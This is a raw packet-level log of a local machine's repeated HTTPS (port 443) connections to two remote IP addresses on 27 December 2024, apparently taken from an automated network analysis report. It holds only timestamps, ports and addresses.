                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.688386917 CET49772443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.689800024 CET49772443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.689814091 CET44349772116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:46.186480045 CET44349772116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:46.186552048 CET49772443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:46.187019110 CET49772443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:46.187024117 CET44349772116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:46.188653946 CET49772443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:46.188657999 CET44349772116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:47.093439102 CET44349772116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:47.093501091 CET44349772116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:47.093516111 CET49772443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:47.093559980 CET49772443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:47.093813896 CET49772443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:47.093833923 CET44349772116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:47.095487118 CET49778443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:47.095511913 CET44349778116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:47.095591068 CET49778443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:47.095880032 CET49778443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:47.095890045 CET44349778116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:48.592485905 CET44349778116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:48.592583895 CET49778443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:48.593496084 CET49778443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:48.593502045 CET44349778116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:48.595083952 CET49778443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:48.595088005 CET44349778116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:49.516247034 CET44349778116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:49.516269922 CET44349778116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:49.516333103 CET44349778116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:49.516340971 CET49778443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:49.516376972 CET49778443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:49.516402006 CET49778443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:49.516582012 CET49778443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:49.516603947 CET44349778116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:49.518181086 CET49784443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:49.518218994 CET44349784116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:49.518311024 CET49784443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:49.518532038 CET49784443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:49.518543959 CET44349784116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:50.962691069 CET44349784116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:50.962946892 CET49784443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:50.963432074 CET49784443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:50.963440895 CET44349784116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:50.965256929 CET49784443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:50.965262890 CET44349784116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:51.853353977 CET44349784116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:51.853377104 CET44349784116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:51.853415966 CET49784443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:51.853435040 CET44349784116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:51.853451967 CET44349784116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:51.853456974 CET49784443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:51.853501081 CET49784443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:51.854043007 CET49784443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:51.854058027 CET44349784116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:51.856045961 CET49790443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:51.856093884 CET44349790116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:51.856189013 CET49790443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:51.856395006 CET49790443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:51.856408119 CET44349790116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:53.301484108 CET44349790116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:53.301553965 CET49790443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:53.302041054 CET49790443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:53.302047968 CET44349790116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:53.303709030 CET49790443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:53.303714991 CET44349790116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:54.194418907 CET44349790116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:54.194489002 CET44349790116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:54.194631100 CET49790443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:54.194631100 CET49790443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:54.194700003 CET49790443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:54.194734097 CET44349790116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:54.213994980 CET49796443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:54.214052916 CET44349796116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:54.214179993 CET49796443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:54.214370966 CET49796443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:54.214395046 CET44349796116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:55.221554041 CET49798443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:55.221605062 CET44349798116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:55.221678972 CET49798443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:55.221878052 CET49798443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:55.221893072 CET44349798116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:55.709836960 CET44349796116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:55.709903955 CET49796443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:55.713213921 CET49796443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:55.713223934 CET44349796116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:55.716356039 CET49796443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:55.716362000 CET44349796116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:55.716398954 CET49796443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:55.716408968 CET44349796116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:56.714806080 CET44349798116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:56.714871883 CET49798443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:56.715415001 CET49798443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:56.715425014 CET44349798116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:56.716028929 CET44349796116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:56.716097116 CET44349796116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:56.716137886 CET49796443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:56.716145992 CET49796443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:56.717452049 CET49796443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:56.717468977 CET44349796116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:56.718540907 CET49798443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:56.718547106 CET44349798116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:57.842080116 CET44349798116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:57.842149973 CET44349798116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:57.842194080 CET49798443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:57.842227936 CET49798443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:57.854199886 CET49798443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:57.854213953 CET44349798116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:57.911519051 CET49814443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:57.911556005 CET44349814142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:57.911658049 CET49814443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:57.912914991 CET49814443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:57.912926912 CET44349814142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:58.326399088 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:58.326436996 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:58.326507092 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:58.326761961 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:58.326797009 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:58.432616949 CET49816443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:58.432638884 CET44349816142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:58.432714939 CET49816443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:58.432961941 CET49816443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:58.432976007 CET44349816142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:58.583162069 CET49817443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:58.583225012 CET44349817142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:58.583694935 CET49817443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:58.689182043 CET49817443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:58.689203024 CET44349817142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:59.655172110 CET44349814142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:59.655380964 CET49814443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:59.655392885 CET44349814142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:59.656584978 CET44349814142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:59.656651020 CET49814443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:59.657516956 CET49814443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:59.657579899 CET44349814142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:59.657783985 CET49814443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:59.657790899 CET44349814142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:59.706934929 CET49814443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.016727924 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.024046898 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.024108887 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.025492907 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.025567055 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.026902914 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.026997089 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.027364016 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.027383089 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.081083059 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.215954065 CET44349816142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.216624022 CET49816443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.216648102 CET44349816142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.217550039 CET44349816142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.217621088 CET49816443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.218460083 CET49816443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.218525887 CET44349816142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.218899965 CET49816443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.218909025 CET44349816142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.274897099 CET49816443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.425245047 CET44349817142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.425862074 CET49817443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.425880909 CET44349817142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.426862001 CET44349817142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.426928043 CET49817443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.427292109 CET49817443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.427352905 CET44349817142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.473421097 CET49817443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.473448992 CET44349817142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.495959997 CET44349814142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.496011019 CET44349814142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.496061087 CET49814443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.496073961 CET44349814142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.497366905 CET44349814142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.497428894 CET49814443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.497435093 CET44349814142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.503423929 CET44349814142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.503535986 CET49814443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.503712893 CET49814443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.503726959 CET44349814142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.517776966 CET49817443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.868372917 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.868422985 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.868452072 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.868479013 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.868503094 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.868499994 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.868571997 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.868688107 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.881671906 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.885981083 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.886385918 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.886420012 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.895435095 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.895509005 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.895529985 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.941391945 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:00.987796068 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.033593893 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.033621073 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.060214996 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.060317993 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.060338020 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.070197105 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.075881004 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.075902939 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.079579115 CET44349816142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.079720020 CET44349816142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.079766989 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.079809904 CET49816443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.080068111 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.080084085 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.081613064 CET49816443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.081628084 CET44349816142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.093441010 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.093508959 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.093518972 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.107110023 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.107290983 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.107336044 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.119971037 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.120428085 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.120445013 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.133693933 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.133867025 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.133877039 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.145899057 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.146435976 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.146445990 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.158449888 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.158972979 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.158983946 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.175194025 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.175334930 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.175347090 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.180160999 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.180330992 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.180346966 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.192702055 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.193121910 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.193140030 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.237258911 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.252087116 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.254416943 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.254503965 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.254522085 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.261015892 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.261101961 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.261104107 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.261126995 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.261316061 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.265996933 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.273730040 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.273850918 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.273926973 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.273960114 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.274091959 CET49815443192.168.2.5142.250.181.68
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.286268950 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.297601938 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.297677040 CET44349815142.250.181.68192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:01.297718048 CET49815443192.168.2.5142.250.181.68
